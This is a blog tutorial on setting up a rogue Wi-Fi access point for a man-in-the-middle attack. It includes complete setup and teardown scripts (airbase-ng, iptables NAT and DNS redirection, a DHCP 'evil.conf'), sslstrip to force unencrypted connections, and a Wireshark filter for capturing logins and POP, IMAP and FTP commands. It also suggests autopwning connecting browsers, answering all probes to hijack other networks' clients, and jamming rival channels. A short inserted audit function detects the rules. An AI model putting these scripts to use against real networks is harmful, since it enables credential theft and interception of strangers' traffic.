Monday, October 10, 2011

Passive Wireless Sniffing Attack

So first off, sorry for the downtime; I've been moving around a lot and trying a lot of things. I really like doing this, so I thought bringing a quality tutorial to the blog might help a little.

The purpose of this tutorial is to teach you how to make a wireless access point solely for the purpose of sniffing. It's great for networks where you can't perform ARP spoofing and wireless is in the mix. There are a lot of possibilities for this attack, but I am only going to cover the basics.

First though, props to qnix over at 0x80, he wrote the blog post that helped inspire this one.

Let's get started >:D

So we begin with a simple plan: create a wireless access point that bridges our ethernet port with our wireless card. (Just for your sanity: I have tried wlan -> wlan bridging and it ended up with A LOT of headaches, from the AP suddenly having a hidden SSID, a setting I had turned off, to DNS issues, so I felt it best to go through eth0.) We need to do a couple of basic things:
  • Create a soft AP
  • Assign IP addresses
  • Sniff the traffic
  • Filter out things that may hinder our sniffing (SSL)
  • Bridge the two adapters
  • Put it all into script form so we can access it whenever
We've got some work to do as most of these are easier said than done.

THE TOOLS:
  • Software
    • The aircrack-ng suite
    • sslstrip
    • dhcp3d
  • Hardware
    • Computer (No fucking duh)
    • Wireless card (Preferably the extremely sexy Alfa AWUS036H)
  • Knowledge
    • DHCP
    • DNS
    • Linux network interfaces
OK now let's actually get started.

Airbase-ng:
First, we need to start airbase-ng. Put the card into monitor mode:
airmon-ng start [if]
Then we just start airbase-ng:
airbase-ng -e "[name of network]" -c [channel] [if (most likely mon0)]
Now we are off to the painful part.

Scripting it up:
setup.sh [if] [gateway] (If you have to edit evil.conf, edit this too.)
#! /bin/bash
# $1 = the interface with the upstream connection (eth0), $2 = the real gateway / DNS server
ifconfig at0 up
ifconfig "$1" up
# at0 becomes the router for the 192.168.3.0/24 client network
ifconfig at0 192.168.3.1 netmask 255.255.255.0
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
# wipe any existing rules, then NAT the at0 clients out through $1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface "$1" -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
# send every client DNS query (udp/53) to the gateway given as $2
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to "$2"

#brctl addbr mitm
#brctl addif mitm $1
#brctl addif mitm at0
#ifconfig mitm up

# install our lease config and start dhcpd in the foreground on at0
cp evil.conf /etc/dhcp3/evil.conf
# pid/lease directory must belong to the dhcpd user (not all of /var/run)
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -d -f -cf /etc/dhcp3/evil.conf at0
destroy.sh [if]
#! /bin/bash
# $1 = the upstream interface that setup.sh was given
ifconfig at0 down
ifconfig "$1" down
# remove the NAT / forwarding rules and turn forwarding back off
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 0 > /proc/sys/net/ipv4/ip_forward

killall -9 dhcpd3

ifconfig "$1" up

# bounce the upstream interface so it picks its normal config back up
ifdown "$1"
ifup "$1"
evil.conf (You will probably need to edit this)
option domain-name-servers 192.168.1.1;
default-lease-time 600;
max-lease-time 720;

ddns-update-style none;
authoritative;
log-facility local7;

subnet 192.168.3.0 netmask 255.255.255.0 {
    range 192.168.3.100 192.168.3.254;
    option routers 192.168.3.1;
    option ip-forwarding on;
    option domain-name-servers 192.168.1.1;
}

Hefty, let's explain what's going on here.

So first up we've got setup.sh. This does a whole host of things, mainly setting up the DHCP stuff; let's chug through it piece by piece.

The first part,
ifconfig at0 up
ifconfig $1 up
turns on at0, the sniffing interface that airbase-ng creates. It then ensures that the interface that is going to be bridged is up.

Let's get more gory.
ifconfig at0 192.168.3.1 netmask 255.255.255.0
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface $1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $2
Happy, right? This sets up most of the IP routing tables and the other painful stuff: at0 gets the 192.168.3.1 address, forwarding is enabled, clients on at0 are masqueraded out through the upstream interface, and the last rule redirects every client DNS query (udp/53) to the gateway you passed as $2. This might need more tweaking if you have a different network setup, but it should work for most people. I'm not going to get too far into this as it's pretty self-explanatory for anyone who has had to deal with iptables before.
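As an added example (not from the original post), here is a small POSIX shell audit function for the other side of the fence: it reads an iptables-save style dump and flags the rule fingerprint that the section above leaves on a Linux box acting as a rogue gateway (MASQUERADE in POSTROUTING, FORWARD accepting from at0, udp/53 DNATed elsewhere). The function name and the use of iptables-save output are my assumptions; the dump at the bottom is constructed to match what setup.sh installs.

```shell
#!/bin/sh
# Audit helper (added here, not part of the original scripts).
# Reads an iptables-save dump on stdin and reports each rule that matches the
# rogue-gateway setup described above. Prints a findings count and returns
# non-zero when anything was found. On a live host run:
#   iptables-save | audit_rogue_gw
audit_rogue_gw() {
    dump=$(cat)
    findings=0
    # setup.sh: iptables -t nat -A POSTROUTING -o $1 -j MASQUERADE
    if printf '%s\n' "$dump" | grep -Eq '^-A POSTROUTING .*-j MASQUERADE'; then
        echo "nat: MASQUERADE in POSTROUTING (host is NATing for other clients)"
        findings=$((findings + 1))
    fi
    # setup.sh: iptables -A FORWARD -i at0 -j ACCEPT (at0 = airbase-ng tap)
    if printf '%s\n' "$dump" | grep -Eq '^-A FORWARD -i at0 .*-j ACCEPT'; then
        echo "filter: FORWARD accepts traffic from at0 (soft-AP interface)"
        findings=$((findings + 1))
    fi
    # setup.sh: iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $2
    if printf '%s\n' "$dump" | grep -Eq '^-A PREROUTING .*-p udp .*--dport 53 .*-j DNAT'; then
        echo "nat: DNS (udp/53) rewritten by DNAT (clients' resolver hijacked)"
        findings=$((findings + 1))
    fi
    echo "findings: $findings"
    [ "$findings" -eq 0 ]
}

# Constructed sample: what iptables-save shows after setup.sh eth0 192.168.1.1
SAMPLE_DUMP='*nat
-A PREROUTING -p udp -m udp --dport 53 -j DNAT --to-destination 192.168.1.1
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
-A FORWARD -i at0 -j ACCEPT
COMMIT'

# Example run:  printf '%s\n' "$SAMPLE_DUMP" | audit_rogue_gw
```

Pair it with a check that /proc/sys/net/ipv4/ip_forward is 0 on hosts that are not supposed to route.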

#brctl addbr mitm
#brctl addif mitm $1
#brctl addif mitm at0
#ifconfig mitm up
This section is commented out, but I left it there for a specific purpose. It is supposed to be easier to use brctl (Bridge Control) to bridge the adapters, but it acts weird and I couldn't get DNS updates. I'll give a nickel to anyone who can make this work :3.

cp evil.conf /etc/dhcp3/evil.conf
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -d -f -cf /etc/dhcp3/evil.conf at0
This sets up our DHCP server. Basically, it just copies our evil.conf file into the dhcp3 folder, creates and chowns the dhcpd run directory, and then starts DHCP on at0 using that conf file.

Next we have destroy.sh, which just undoes the changes and removes the bridge. It also kills DHCP.

Lastly we may need to edit the evil.conf file. The only lines you should need to edit are the top one,
option domain-name-servers 192.168.1.1;
and this section
subnet 192.168.3.0 netmask 255.255.255.0 {
range 192.168.3.100 192.168.3.254;
option routers 192.168.3.1;
option ip-forwarding on;
option domain-name-servers 192.168.1.1;
}
Usually you will just edit the subnet (e.g. changing 192.168.3.0 to 192.168.6.0). If you do, be sure to change the corresponding values in setup.sh.

Putting It All Together:
Next we just run the scripts. Make sure that airbase-ng is up so that at0 is present, or else this will just error out.

Just run:
./setup.sh [if] [gateway]
This keeps dhcpd in the foreground in verbose mode and lets you know when new clients connect. You may want to run sslstrip next. It strips SSL elements out of a page, so it forces an unencrypted connection.
./sslstrip.py -k -a -f
Lastly just run wireshark on at0, with this display filter:
http.request.method == POST || http.request.method == GET || http.request.uri contains login || pop.request.command || imap.response == 1 || ftp.request.command
There are a couple extra things you can do after this.

For starters you can do what is suggested in the article on 0x80 and run an exploit server autopwning any browser that connects. However, the drawback to this is that Windows will notify the user of a limited connection, and that might make people switch networks since they can't access the internet.

The other one I thought of was to use:
airbase-ng -P mon0
This responds to all probes even if they specify an ESSID, which lets you hijack other networks as long as you have better signal strength. The drawback, however, is that most people WILL have a better connection to their original router.

The best one I could think of was to use wifijammer to block all signals on all channels except yours (use an unused channel like 4 or whatever). This will make people want to connect to you, as everyone else's connection doesn't work. There are still drawbacks, like whether they will actually know HOW to connect to a new wifi network. Some people are just that special.

Either way hope this helps, a good section was taken from 0x80, most of the credit goes to him and the community.
